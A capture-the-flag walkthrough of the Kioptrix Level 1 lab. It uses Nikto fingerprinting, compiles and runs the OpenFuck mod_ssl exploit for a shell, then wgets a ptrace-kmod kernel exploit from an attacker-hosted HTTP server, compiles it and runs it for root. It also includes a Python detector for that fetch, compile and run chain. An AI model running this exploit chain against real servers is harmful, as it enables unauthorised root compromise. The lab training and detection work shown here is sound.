Task 1: Web Enumeration with Nikto

We start by running Nikto against the target to identify the web server version and any known vulnerabilities:

nikto --host http://<target-ip>

Nikto reveals the web server is running:

Apache httpd 1.3.20 ((Unix) mod_ssl/2.8.4)

This is a very outdated Apache and mod_ssl build with a well-known vulnerability, so we search Exploit-DB for a matching exploit.

Task 2: Finding & Compiling the OpenFuck Exploit

We use searchsploit to locate the exploit locally:

searchsploit 47080

Before compiling, we install the required SSL development library:

apt-get install libssl-dev

We then compile the exploit:

gcc -o OpenFuck 47080.c -lcrypto

Task 3: Running OpenFuck

We first run the exploit without arguments to view the available target offset codes:

./OpenFuck

We identify two potential offsets for Apache 1.3.20 on Unix and try both:

./OpenFuck 0x6a <target-ip> -c 40-50
./OpenFuck 0x6b <target-ip> -c 40-50

The correct offset gives us a shell on the target. However, to fully escalate privileges we need an additional kernel exploit.

Task 4: Serving the Kernel Exploit

We download the ptrace/kmod local privilege escalation exploit from Packet Storm Security:

https://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

From the download folder, we look up our attacking machine's IP address:

ifconfig

We serve the file over HTTP using Python:

python3 -m http.server 8000

Task 5: Downloading & Compiling the Exploit on Target

From the shell we obtained via OpenFuck, we download the kernel exploit onto the target machine:

wget http://<attacker-ip>:8000/ptrace-kmod.c

We compile it directly on the target:

gcc -o exploit ptrace-kmod.c -B /usr/bin

Then we execute it to escalate to root:

./exploit

We now have a root shell.
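
The download, compile and run sequence in this task is also the trail a defender can alert on. The following Python detection is an added example, not part of the original walkthrough: it flags a service account that fetches a file, compiles it and then runs the result. The event format, the account list, the time window and the sample address are assumptions constructed for the example.

```python
import shlex

# Constructed events in an invented format (epoch user parent command); not real auditd output.
SAMPLE_EVENTS = """\
1700000000 apache httpd /bin/sh -i
1700000042 apache sh wget http://198.51.100.7:8000/ptrace-kmod.c
1700000060 apache sh gcc -o exploit ptrace-kmod.c -B /usr/bin
1700000071 apache sh ./exploit
1700000100 john bash gcc -o hello hello.c
"""

SERVICE_ACCOUNTS = {"apache", "www-data", "nobody"}  # assumption: tune per host
FETCHERS = {"wget", "curl"}
COMPILERS = {"gcc", "cc"}
WINDOW = 600  # max seconds from download to execution

def base(path):
    return path.rsplit("/", 1)[-1]

def detect(events_text):
    """Return (user, source, binary, seconds) for each fetch -> compile -> run chain."""
    fetched, built, alerts = {}, {}, []   # keyed by (user, file name)
    for line in events_text.splitlines():
        if not line.strip():
            continue
        ts, user, _parent, cmd = line.split(None, 3)
        if user not in SERVICE_ACCOUNTS:
            continue
        ts, argv = int(ts), shlex.split(cmd)
        prog = base(argv[0])
        if prog in FETCHERS:
            # Remember the file name at the end of every URL argument.
            for arg in argv[1:]:
                if "://" in arg:
                    fetched[(user, base(arg))] = ts
        elif prog in COMPILERS:
            # A compile counts only if one of its inputs was downloaded earlier.
            out = argv[argv.index("-o") + 1] if "-o" in argv[:-1] else "a.out"
            for arg in argv[1:]:
                if (user, base(arg)) in fetched:
                    built[(user, base(out))] = (fetched[(user, base(arg))], base(arg))
        elif (user, prog) in built:
            start, src = built[(user, prog)]
            if ts - start <= WINDOW:
                alerts.append((user, src, prog, ts - start))
    return alerts

if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
```

A web server account has no routine reason to invoke a compiler, so on production hosts the compile step alone is worth an alert, and removing the compiler from such hosts breaks this chain.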

Final Flag

cd /root
cat flag.txt

Final Thoughts

Kioptrix Level 1 is a classic beginner machine that simulates a real-world scenario of an unpatched server being exploited. It covers:

  • Web server fingerprinting with Nikto
  • Searching and compiling public exploits from Exploit-DB
  • Apache mod_ssl exploitation using OpenFuck
  • Serving files over HTTP with Python
  • Local kernel privilege escalation using ptrace/kmod